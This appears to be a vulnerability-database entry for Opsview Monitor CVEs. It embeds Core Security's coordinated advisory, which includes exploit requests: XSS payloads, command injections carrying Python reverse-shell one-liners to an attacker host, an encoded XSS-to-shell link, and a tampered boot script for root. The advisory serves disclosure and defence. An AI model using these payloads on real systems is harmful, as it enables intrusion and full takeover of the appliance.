"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-09-05T00:00:00",
"db": "CNVD",
"id": "CNVD-2018-17455"
},
{
"date": "2018-09-05T00:00:00",
"db": "VULMON",
"id": "CVE-2018-16148"
},
{
"date": "2018-12-11T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-010276"
},
{
"date": "2018-09-05T17:57:27",
"db": "PACKETSTORM",
"id": "149236"
},
{
"date": "2018-09-05T21:29:03.063000",
"db": "NVD",
"id": "CVE-2018-16148"
},
{
"date": "2018-09-05T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201809-157"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-09-05T00:00:00",
"db": "CNVD",
"id": "CNVD-2018-17455"
},
{
"date": "2018-11-13T00:00:00",
"db": "VULMON",
"id": "CVE-2018-16148"
},
{
"date": "2018-12-11T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-010276"
},
{
"date": "2018-11-13T14:41:15.413000",
"db": "NVD",
"id": "CVE-2018-16148"
},
{
"date": "2018-09-12T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201809-157"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "PACKETSTORM",
"id": "149236"
},
{
"db": "CNNVD",
"id": "CNNVD-201809-157"
}
],
"trust": 0.7
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Opsview Monitor Cross-Site Scripting Vulnerability",
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-17455"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-010276"
},
{
"db": "CNNVD",
"id": "CNNVD-201809-157"
}
],
"trust": 2.0
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "xss",
"sources": [
{
"db": "PACKETSTORM",
"id": "149236"
},
{
"db": "CNNVD",
"id": "CNNVD-201809-157"
}
],
"trust": 0.7
}
}
VAR-201809-0903
Vulnerability from variot - Updated: 2023-12-18 12:01
The /etc/init.d/opsview-reporting-module script that runs at boot time in Opsview Monitor before 5.3.1 and 5.4.x before 5.4.2 invokes a file that can be edited by the nagios user, and would allow attackers to elevate their privileges to root after a system restart, hence obtaining full control of the appliance. Opsview Monitor contains vulnerabilities related to authorization, permissions, and access control. Information may be obtained or altered, and service operation may be disrupted (DoS). Opsview Monitor is a virtual appliance designed to be deployed in an organization's network infrastructure. It is bundled with a web management console to monitor and manage the host and its services. Opsview Monitor has a local privilege escalation vulnerability that allows an attacker to gain full control of a device by escalating privileges from the nagios user to root after the system is restarted.
Core Security - Corelabs Advisory
http://corelabs.coresecurity.com/
Opsview Monitor Multiple Vulnerabilities
- Advisory Information
Title: Opsview Monitor Multiple Vulnerabilities
Advisory ID: CORE-2018-0008
Advisory URL: http://www.coresecurity.com/advisories/opsview-monitor-multiple-vulnerabilities
Date published: 2018-09-04
Date of last update: 2018-09-04
Vendors contacted: Opsview
Release mode: Coordinated release
- Vulnerability Information
Class: Improper Neutralization of Input During Web Page Generation [CWE-79], Improper Neutralization of Input During Web Page Generation [CWE-79], Improper Neutralization of Special Elements used in an OS Command [CWE-78], Improper Neutralization of Special Elements used in an OS Command [CWE-78], Execution with Unnecessary Privileges [CWE-250]
Impact: Code execution
Remotely Exploitable: Yes
Locally Exploitable: Yes
CVE Name: CVE-2018-16148, CVE-2018-16147, CVE-2018-16146, CVE-2018-16144, CVE-2018-16145
- Vulnerability Description
Opsview's website states that:
Opsview[1] builds monitoring software that helps DevOps understand how the performance of their hybrid IT infrastructure & apps impacts business service delivery. Opsview Monitor supports +3500 Nagios plugins and service checks making it easy to monitor everything from Docker and VMware to Amazon Web Services, Hyper-V and more.
- Vulnerable Packages
. Opsview Monitor 5.4
. Opsview Monitor 5.3
. Opsview Monitor 5.2
Other products and versions might be affected, but they were not tested.
- Vendor Information, Solutions and Workarounds
Opsview released the following versions of its product that fix the reported issues.
. Opsview Monitor 6.0
. Opsview Monitor 5.4.2
. Opsview Monitor 5.3.1
In addition, Opsview published the following release notes:
. https://knowledge.opsview.com/v5.4/docs/whats-new
. https://knowledge.opsview.com/v5.3/docs/whats-new
- Credits
These vulnerabilities were discovered and researched by Fernando Diaz and Fernando Catoira from Core Security Consulting Services. The publication of this advisory was coordinated by Leandro Cuozzo from Core Advisories Team.
- Multiple vulnerabilities were found in the context of this appliance, which could allow a remote attacker to compromise the system. Vulnerabilities described in 7.1 and 7.2 could be abused to execute malicious JavaScript code in the context of a legitimate user. In addition, issues presented in 7.3 and 7.4 could allow an attacker to obtain command execution on the system as the nagios user.
7.1. Reflected Cross-Site Scripting in Diagnostics
[CVE-2018-16148] The 'diagnosticsb2ksy' parameter of the '/rest' endpoint is vulnerable to Cross-Site Scripting.
The following proof of concept demonstrates the vulnerability:
/-----
GET /rest/diagnosticsb2ksy%253cscript%253ealert(1)%253c%252fscript%253ev7uol%3ffilename=1%26download=1 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:59.0) Gecko/20100101 Firefox/59.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: opsview_web_session=46f985298c7bba5291a18c3a749362a08eaa9401; auth_tkt=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%3D%3D
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
-----/
7.2. Persistent Cross-Site Scripting in Settings endpoint
[CVE-2018-16147] The 'data' parameter of the '/settings/api/router' endpoint is vulnerable to Cross-Site Scripting. The following proof of concept demonstrates the vulnerability:
/-----
POST /settings/api/router?_dc=1521575692128 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:59.0) Gecko/20100101 Firefox/59.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https:///settings/
x-opsview-username: rifle
x-opsview-token: 053f415648640ea5a9d0c6e3e7f5603cf7b08503
Content-Type: application/json
X-Requested-With: XMLHttpRequest
Content-Length: 506
Cookie: opsview_web_session=3b8059865b28b96a5cd27a6d4fb4193bed9aa256; auth_tkt=ZTFiMzFlODc1ZDUzYzk3MzEwMGM2MjhiZTgxMzRhMDQ1YWIxNWNlOXBlbnRlc3QhREFTSEJPQVJELERBU0hCT0FSREVESVQsREFTSEJPQVJEU0hBUkUsTkFWT1BUSU9OUyxOT1RJRllTT01FLFBBU1NXT1JEU0FWRSxSUkRHUkFQSFMsVklFV0FMTCE%3D
Connection: close

[{"action":"SettingsServer","method":"setObjecttypeState","data":["alert(4)","{\"storeState\":{\"sorters\":[{\"root\":\"data\",\"property\":\"name\",\"direction\":\"ASC\"}],\"filters\":[],\"pageSize\":50,\"page\":1}}"],"type":"rpc","tid":2},{"action":"SettingsServer","method":"setObjecttypeState","data":["profile","{\"storeState\":{\"sorters\":[{\"root\":\"data\",\"property\":\"name\",\"direction\":\"ASC\"}],\"filters\":[],\"pageSize\":50,\"page\":1}}"],"type":"rpc","tid":3}] -----/
The input is stored without any sanitization and rendered every time the user visits the /settings section. It's important to point out that this XSS is self-stored and executes only in the context of the victim's session. However, an attacker can exploit this vulnerability to gain persistence and execute the malicious code each time the victim accesses the settings section. Excerpt of the source code showing the injected script tag:
/----- [{"property":"name","root":"data","direction":"ASC"}]}},"contact":{"storeState":{"pageSize":50,"filters":[],"page":1,"sorters":[{"direction":"ASC","property":"name","root":"data"}]}},"alert(4)":{"storeState":{"sorters":[{"root":"data","property":"name","direction":"ASC"}],"pageSize":50,"filters":[],"page":1}},"hostcheckcommand":{"storeState":{"pageSize":50,"filters":[],"page":1,"sorters":[{"direction":"ASC","property":"priority","root":"data"}]}},"netflow_collector":{"storeState":{"sorters":[{"direction":"ASC","root":"data","property":"name"}],"page":1,"filters":[],"pageSize":50}},"alert(4)":{"storeState":{"sorters":[{"direction":"ASC","root":"data","property":"name"}]," -----/
7.3. Notification abuse leading to remote command execution
[CVE-2018-16146] Opsview Web Management console provides a functionality accessible by an authenticated administrator to test notifications that are triggered under certain configurable events. The 'value' parameter is not properly sanitized, leading to an arbitrary command injection executed on the system with nagios' user privileges.
The following proof of concept executes a reverse shell:
/-----
POST /rest/config/notificationmethod/testnotification?_dc=1520444703477 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:58.0) Gecko/20100101 Firefox/58.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https:///settings/
x-opsview-username: admin
x-opsview-token: 7ac1116c336cc648cda6caa707a17d7aa6114074
Content-Type: application/json
X-Requested-With: XMLHttpRequest
Content-Length: 376
Cookie: redirect=1; testing=1; sid=9bfa04afc5ccc966c623078bab8834e0; opsview_web_session=5071271ffb62fffffcb589c9ae9ab9c23d780b13; auth_tkt=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%3D%3D
Connection: close

{"message":"Test Message","command":"submit_xmpp_script","variables":[],"test_variables":[{"name":"PAGER","value":"123123123 || python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"\",16000));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'"}],"id":"20"} -----/
/-----
nc -lvp 16000
Listening on [0.0.0.0] (family 0, port 16000)
Connection from [] port 16000 [tcp/*] accepted (family 2, sport 43016)
$ id
uid=998(nagios) gid=997(nagios) groups=997(nagios),998(nagcmd),999(opsview)
-----/
Additionally, it is possible to combine this issue with a redirection functionality within the management console and the vulnerability described in 7.1 (Reflected Cross-Site Scripting), to build a specially crafted link that could be sent to an administrator to trigger a reverse shell.
In order to perform the attack, consider the following:
. API's sensitive actions require a 'restToken' to be processed. This token could be obtained by a Cross-Site Scripting attack from a specific endpoint (/settings). Abuse the login page redirection functionality to force the user to access the Cross-Site Scripting vulnerable URL described in 7.1 (you may also abuse the Cross-Site scripting vulnerability reported in https://www.cvedetails.com/cve/CVE-2016-2511/ given it is still present). If the user is already authenticated he will be automatically redirected. Otherwise, the login page will appear and the redirection will take place after a successful login.
The following proof of concept presents a crafted link that could trigger a reverse shell if accessed by an administrator:
/----- https:///login?back=%2Frest%2Fdiagnosticsb2ksy%253cscript%253eeval(atob(%27dmFyIHhociA9IG5ldyBYTUxIdHRwUmVxdWVzdCgpO3hoci5vbnJlYWR5c3RhdGVjaGFuZ2UgPSBmdW5jdGlvbigpIHtpZiAoeGhyLnJlYWR5U3RhdGUgPT0gWE1MSHR0cFJlcXVlc3QuRE9ORSl7cmVnZXhwID0gLyg%2FOnJlc3RUb2tlbiI6IikoLio%2FKSg%2FOiIpLzt0b2tlbiA9IHJlZ2V4cC5leGVjKHhoci5yZXNwb25zZVRleHQpWzFdO3JlZ2V4cCA9IC8oPzp1c2VyTmFtZSI6IikoLio%2FKSg%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%2BXCIsMTYwMDApKTtvcy5kdXAyKHMuZmlsZW5vKCksMCk7IG9zLmR1cDIocy5maWxlbm8oKSwxKTsgb3MuZHVwMihzLmZpbGVubygpLDIpO3A9c3VicHJvY2Vzcy5jYWxsKFtcIi9iaW4vc2hcIixcIi1pXCJdKTsnIn1dLCJpZCI6IjEifTt4aHIyLnNlbmQoSlNPTi5zdHJpbmdpZnkoYm9keSkpO2FsZXJ0KHRva2VuKTthbGVydCh1c2VybmFtZSk7fX07eGhyLm9wZW4oJ1BPU1QnLCAnL3NldHRpbmdzLycsIHRydWUpO3hoci5zZW5kKG51bGwpOw%3D%3D%27))%253c%25252fscript%253ev7uol%3ffilename=1%26download=1 -----/
Once clicked, the authenticated administrator will be redirected to the vulnerable section where his browser will perform a request to the '/settings' endpoint in order to obtain a valid 'restToken'. Finally, using that token, the API request to 'rest/config/notificationmethod/testnotification' will be exploited thus resulting in a reverse shell.
7.4. Rancid test connection functionality abuse leading to command execution
[CVE-2018-16144] NetAudit is a section within Network Analyzer that allows the user to automate the backing up of network devices' configuration files to a centralized location. The test connection functionality is vulnerable to command injection due to an improper sanitization of the 'rancid_password' parameter.
The following proof of concept executes a reverse shell:
/-----
POST /rest/config/host/test_rancid_connection?_dc=1521569909290 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:59.0) Gecko/20100101 Firefox/59.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https:///settings/
x-opsview-username: admin
x-opsview-token: b3d716e0157fd6337e6978220188051d8c578850
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 434
Cookie: opsview_web_session=8f48a60452543863c3ee3662202a0d0ef568e86f; auth_tkt=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%3D%3D
Connection: close

ip=++++++&rancid_vendor=1&rancid_username=234234+add+password+xxxxx&rancid_connection_type=telnet&rancid_autoenable=1&rancid_password=2342342342+%3b+sleep%2011%3b%20python+-c+'import+socket,subprocess,os%3bs%3dsocket.socket(socket.AF_INET,socket.SOCK_STREAM)%3bs.connect(("<attackerIP>",16000))%3bos.dup2(s.fileno(),0)%3b+os.dup2(s.fileno(),1)%3b+os.dup2(s.fileno(),2)%3bp%3dsubprocess.call(["/bin/sh","-i"])%3b'&host_id=2
-----/
/-----
nc -lvp 16000
Listening on [0.0.0.0] (family 0, port 16000)
Connection from [] port 16000 [tcp/*] accepted (family 2, sport 43016)
$ id
uid=998(nagios) gid=997(nagios) groups=997(nagios),998(nagcmd),999(opsview)
$ uname -a
Linux image-builder-299 4.4.0-1010-aws #10-Ubuntu SMP Tue Jan 9 23:01:34 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
-----/
7.5. However, the '/etc/init.d/opsview-reporting-module' script invokes the '/opt/opsview/jasper/bin/db_jasper' script before dropping root privileges.
The following excerpt shows the vulnerable code:
/-----
/etc/init.d/opsview-reporting-module:

/opt/opsview/jasper/bin/db_jasper db_exists 2> /dev/null
if [ $? != 0 ]; then
    echo "Attempted to start jasperserver but MySQL credentials are wrong."
    exit 0
fi

DAEMON=/opt/opsview/jasper/bin/rc.jasperserver

test -x $DAEMON || exit 0

# Switch to opsview user if run as root
id | grep "uid=0(" >/dev/null
if [ $? = 0 ] ; then
    su - opsview -c "$DAEMON $@"
else
    exec $DAEMON $@
fi
-----/
The file '/opt/opsview/jasper/bin/db_jasper', which is invoked by the vulnerable script, can be edited by the nagios user which belongs to the 'opsview' group.
/-----
ls -ltr /opt/opsview/jasper/bin/db_jasper
-rwxrwxr-x 1 opsview opsview 2531 Feb 6 2017 /opt/opsview/jasper/bin/db_jasper
nagios@image-builder-299:/home/admin$ id
uid=998(nagios) gid=997(nagios) groups=997(nagios),998(nagcmd),999(opsview)
-----/
Since 'db_jasper' receives 'db_exists' as an argument, which is later used in a case statement, an attacker could edit that specific part of the script in order to execute arbitrary code once the appliance is rebooted.
The following excerpt shows the attacker's bash script which, after execution, will trigger a reverse shell with root privileges:
/-----
while [ "x$1" != "x" ] ; do
    case "$1" in
        db_export)
            db_export
            ;;
        db_export_test)
            db_export_test
            ;;
        db_export_initial)
            TEST=1 db_backup
            ;;
        db_import)
            db_import
            ;;
        db_install)
            db_install
            ;;
        db_backup)
            db_backup
            ;;
        db_restore)
            db_restore
            ;;
        db_exists)
            python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("",16000));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);' &
            db_exists
            exit $?
            ;;
        db_upgrade)
            db_upgrade
            exit $?
            ;;
        *)
            die "Usage: $0 {db_export|db_import|db_install|db_backup|db_restore}"
            ;;
    esac
    shift
done
-----/
/-----
$nc -lvp 16000
Listening on [0.0.0.0] (family 0, port 16000)
Connection from [] port 16000 [tcp/*] accepted (family 2, sport 45566)
# id
uid=0(root) gid=0(root) groups=0(root)
-----/
- Report Timeline
2018-05-03: Core Security sent an initial notification to Opsview, asking for GPG keys in order to send draft advisory.
2018-05-04: Opsview replied attaching its GPG keys.
2018-05-04: Core Security sent the encrypted draft advisory.
2018-05-04: Opsview confirmed the reception of the advisory and informed an initial response would be ready by May 11th.
2018-05-11: Opsview replied saying they were able to reproduce all of the reported vulnerabilities and confirmed that they were present in all supported versions of Opsview Monitor (5.4, 5.3 and 5.2). In addition, Opsview informed that they were planning to release a fix for these versions by the end of July.
2018-05-11: Core Security thanked the confirmation.
2018-06-25: Opsview informed that they were planning to release a major update for the product (6.0) at the end of July. This update will address all reported vulnerabilities. Also, they informed that the previous versions of the product would be fixed by the end of August.
2018-06-27: Core Security thanked the status update and asked for a tentative public disclosure date.
2018-07-16: Core Security requested a status update.
2018-07-18: Opsview proposed to set a tentative publication date by the end of August when they release the fixes for its earlier versions.
2018-07-18: Core Security agreed with Opsview's proposal.
2018-07-23: Opsview notified Core Security that the Opsview Monitor 6.0 release will be available on July 25th. In addition, they informed that they didn't have the exact release date for the updates to previous versions of the product.
2018-08-06: Core Security requested a status update for the remaining fixes.
2018-08-13: Opsview replied saying that they were targeting the week of August 24th to release the fixes of their earlier product versions and they would confirm the exact date at the end of the next week.
2018-08-13: Core Security thanked the reply.
2018-08-24: Opsview informed Core Security that the remaining fixed versions will be available on August 29th.
2018-08-24: Core Security thanked the update and proposed September 4th as the coordinated release date.
2018-08-28: Opsview agreed on the proposed release date.
2018-09-04: Advisory CORE-2018-0008 published.
- References
[1] https://www.opsview.com/solutions
- About CoreLabs
CoreLabs, the research center of Core Security, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com.
- About Core Security
Core Security provides companies with the security insight they need to know who, how, and what is vulnerable in their organization. The company's threat-aware, identity & access, network security, and vulnerability management solutions provide actionable insight and context needed to manage security risks across the enterprise. This shared insight gives customers a comprehensive view of their security posture to make better security remediation decisions. Better insight allows organizations to prioritize their efforts to protect critical assets, take action sooner to mitigate access risk, and react faster if a breach does occur.
Core Security is headquartered in the USA with offices and operations in South America, Europe, Middle East and Asia. To learn more, contact Core Security at (678) 304-4500 or info@coresecurity.com
- Disclaimer
The contents of this advisory are copyright (c) 2018 Core Security and (c) 2018 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/
{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201809-0903",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "opsview",
"scope": "lt",
"trust": 1.0,
"vendor": "opsview",
"version": "5.3.1"
},
{
"model": "opsview",
"scope": "gte",
"trust": 1.0,
"vendor": "opsview",
"version": "5.4.0"
},
{
"model": "opsview",
"scope": "lt",
"trust": 1.0,
"vendor": "opsview",
"version": "5.4.2"
},
{
"model": "opsview",
"scope": "lt",
"trust": 0.8,
"vendor": "opsview",
"version": "5.4.x"
},
{
"model": "opsview",
"scope": "eq",
"trust": 0.8,
"vendor": "opsview",
"version": "5.4.2"
},
{
"model": "monitor",
"scope": "eq",
"trust": 0.6,
"vendor": "opsview",
"version": "5.4"
},
{
"model": "monitor",
"scope": "eq",
"trust": 0.6,
"vendor": "opsview",
"version": "5.3"
},
{
"model": "monitor",
"scope": "eq",
"trust": 0.6,
"vendor": "opsview",
"version": "5.2"
},
{
"model": "opsview",
"scope": "eq",
"trust": 0.6,
"vendor": "opsview",
"version": "4.4.0"
},
{
"model": "opsview",
"scope": "eq",
"trust": 0.6,
"vendor": "opsview",
"version": "4.6.2"
},
{
"model": "opsview",
"scope": "eq",
"trust": 0.6,
"vendor": "opsview",
"version": "4.3"
},
{
"model": "opsview",
"scope": "eq",
"trust": 0.6,
"vendor": "opsview",
"version": "4.4.1"
},
{
"model": "opsview",
"scope": "eq",
"trust": 0.6,
"vendor": "opsview",
"version": "4.2"
},
{
"model": "opsview",
"scope": "eq",
"trust": 0.6,
"vendor": "opsview",
"version": "4.4"
},
{
"model": "opsview",
"scope": "eq",
"trust": 0.6,
"vendor": "opsview",
"version": "4.6.3"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-17451"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-010273"
},
{
"db": "NVD",
"id": "CVE-2018-16145"
},
{
"db": "CNNVD",
"id": "CNNVD-201809-154"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:opsview:opsview:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "5.3.1",
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:opsview:opsview:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "5.4.2",
"versionStartIncluding": "5.4.0",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2018-16145"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Core Security Technologies, Fernando Diaz, Fernando Catoira",
"sources": [
{
"db": "PACKETSTORM",
"id": "149236"
}
],
"trust": 0.1
},
"cve": "CVE-2018-16145",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "COMPLETE",
"baseScore": 9.3,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 8.6,
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "HIGH",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Medium",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "Complete",
"baseScore": 9.3,
"confidentialityImpact": "Complete",
"exploitabilityScore": null,
"id": "CVE-2018-16145",
"impactScore": null,
"integrityImpact": "Complete",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "High",
"trust": 0.9,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "LOCAL",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "COMPLETE",
"baseScore": 7.2,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 3.9,
"id": "CNVD-2018-17451",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.6,
"vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "HIGH",
"baseScore": 8.1,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.2,
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
},
{
"attackComplexity": "High",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 8.1,
"baseSeverity": "High",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2018-16145",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2018-16145",
"trust": 1.8,
"value": "HIGH"
},
{
"author": "CNVD",
"id": "CNVD-2018-17451",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-201809-154",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "VULMON",
"id": "CVE-2018-16145",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-17451"
},
{
"db": "VULMON",
"id": "CVE-2018-16145"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-010273"
},
{
"db": "NVD",
"id": "CVE-2018-16145"
},
{
"db": "CNNVD",
"id": "CNNVD-201809-154"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "The /etc/init.d/opsview-reporting-module script that runs at boot time in Opsview Monitor before 5.3.1 and 5.4.x before 5.4.2 invokes a file that can be edited by the nagios user, and would allow attackers to elevate their privileges to root after a system restart, hence obtaining full control of the appliance. Opsview Monitor Contains vulnerabilities related to authorization, permissions, and access control.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. OpsviewMonitor is a virtual appliance designed to be deployed in an organization\u0027s network infrastructure. It is bundled with the web management console to monitor and manage the host and its services. OpsviewMonitor has a local privilege escalation vulnerability that allows an attacker to gain full control of a device by upgrading its privileges from nagios users to root after the system is restarted. Core Security - Corelabs Advisory\nhttp://corelabs.coresecurity.com/\n\nOpsview Monitor Multiple Vulnerabilities\n\n1. **Advisory Information**\n\nTitle: Opsview Monitor Multiple Vulnerabilities\nAdvisory ID: CORE-2018-0008\nAdvisory URL:\nhttp://www.coresecurity.com/advisories/opsview-monitor-multiple-vulnerabilities\nDate published: 2018-09-04\nDate of last update: 2018-09-04\nVendors contacted: Opsview\nRelease mode: Coordinated release\n\n2. **Vulnerability Information**\n\nClass: Improper Neutralization of Input During Web Page Generation\n[CWE-79], Improper Neutralization of Input During Web Page Generation\n[CWE-79], Improper Neutralization of Special Elements used in an OS\nCommand [CWE-78], Improper Neutralization of Special Elements used in\nan OS Command [CWE-78], Execution with Unnecessary Privileges [CWE-250]\nImpact: Code execution\nRemotely Exploitable: Yes\nLocally Exploitable: Yes\nCVE Name: CVE-2018-16148, CVE-2018-16147, CVE-2018-16146, CVE-2018-16144,\nCVE-2018-16145\n\n3. 
